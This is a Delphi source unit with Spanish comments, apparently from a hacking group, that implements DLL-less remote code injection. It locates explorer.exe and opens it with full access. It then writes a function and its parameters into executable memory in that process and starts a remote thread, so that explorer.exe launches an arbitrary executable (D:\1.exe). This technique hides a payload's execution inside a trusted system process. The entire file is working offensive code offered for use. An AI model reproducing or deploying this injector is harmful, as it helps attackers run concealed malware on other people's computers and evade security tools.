//******************************************************************************
//* UNIT: UNT_InjectNoDLL
//* AUTOR: Fakedo0r .:PD-TEAM:.
//* FECHA: 31.08.2012
//* CORREO: Luvel88@gmail.com
//* BLOG: Sub-Soul.blogspot.com / Sub-Soul.com
//* USO: Inyectora;
//******************************************************************************
Unit UNT_InjectNoDLL;
//******************************************************************************
//DECLARACION DE LIBRERIAS / CLASES
//******************************************************************************
Interface
Uses
Winapi.Windows, TLHelp32, PsAPI, ShellAPI;
//******************************************************************************
//DECLARACION DE ESTRUCTURAS
//******************************************************************************
Type
PTINJECT = ^TINJECT;
TINJECT = Record
__ShellExecute: Function(HWND: HWND; Operation, FileName, Parameters,
Directory: PWideChar; ShowCmd: Integer): HINST; Stdcall;
cExe: Array [0 .. MAX_PATH] Of Char;
cOper: Array [0 .. MAX_PATH] Of Char;
End;
//******************************************************************************
//DECLARACION DE FUNCIONES / PROCEDIMIENTOS
//******************************************************************************
Procedure Inyectada(tInj: PTINJECT); Stdcall;
Procedure Inyectora;
Function AllocAndCopyMem(hProcess: THandle; ptBuffer: Pointer;
iBuffSize: Int64): Pointer;
//******************************************************************************
Implementation
//******************************************************************************
//<--- LA FUNCION QUE VAMOS A INYECTAR --->
//******************************************************************************
Procedure Inyectada(tInj: PTINJECT); Stdcall;
Begin
tInj.__ShellExecute(0, tInj.cOper, tInj.cExe, Nil, Nil, 1);
End;
//******************************************************************************
//<--- LA FUNCION QUE OPERA LA INYECCION --->
//******************************************************************************
Procedure Inyectora;
Var
uTamFun: UINT;
dwPID: DWORD;
dwExitCode: DWORD;
hThread: THandle;
hProcess: THandle;
ptStruct: Pointer;
ptEsp: Pointer;
tProcEntry: TProcessEntry32;
tInj: TINJECT;
Begin
uTamFun := 0;
dwExitCode := 0;
hProcess := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
tProcEntry.dwSize := Sizeof(tProcEntry);
If Process32First(hProcess, tProcEntry) Then
Begin
Repeat
If tProcEntry.szExeFile = \'explorer.exe\' Then
Begin
dwPID := tProcEntry.th32ProcessID;
Break;
End;
Until Not Process32Next(hProcess, tProcEntry);
End;
CloseHandle(hProcess);
// obtenemos el handle del proceso
hProcess := OpenProcess(PROCESS_ALL_ACCESS, False, dwPID);
// obtenemos el puntero del api
@tInj.__ShellExecute := GetProcAddress(LoadLibrary(\'Shell32.dll\'),
\'ShellExecuteW\');
// copiamos los datos en las variables
lstrcpy(tInj.cExe, PChar(\'D:\\1.exe\'));
lstrcpy(tInj.cOper, PChar(\'open\'));
// reservamos y copiamos nuestra estructura a la memoria
ptStruct := AllocAndCopyMem(hProcess, @tInj, Sizeof(TINJECT));
// calculamos el tamaƱo de nuestra funcion
uTamFun := UINT(@Inyectora) - UINT(@Inyectada);
// reservamos y copiamos nuestra funcion a la memoria
ptEsp := AllocAndCopyMem(hProcess, @Inyectada, uTamFun);
// creamos el hilo remoto
hThread := CreateRemoteThread(hProcess, Nil, 0, ptEsp, ptStruct, 0,
PDWORD(Nil)^);
If hThread <> 0 Then
Begin
// esperamos hasta que se cree el hilo
WaitForSingleObject(hThread, INFINITE);
// obtenemos el estado de terminacion del hilo
GetExitCodeThread(hThread, dwExitCode);
// liberamos el handle del hilo creado
CloseHandle(hThread);
// liberamos el espacio en el proceso
VirtualFreeEx(hProcess, ptStruct, 0, MEM_RELEASE);
VirtualFreeEx(hProcess, ptEsp, 0, MEM_RELEASE);
End;
// liberamos el handle del proceso
CloseHandle(hProcess);
End;
//******************************************************************************
//<--- RESERVA ESPACIO Y ESCRIBE EN LA MEMORIA --->
//******************************************************************************
Function AllocAndCopyMem(hProcess: THandle; ptBuffer: Pointer;
iBuffSize: Int64): Pointer;
Var
iBytesWritten: SIZE_T;
Begin
iBytesWritten := 0;
// reservamos espacio
Result := VirtualAllocEx(hProcess, Nil, iBuffSize, MEM_COMMIT Or MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
// escribimos
WriteProcessMemory(hProcess, Result, ptBuffer, iBuffSize, iBytesWritten);
End;
End.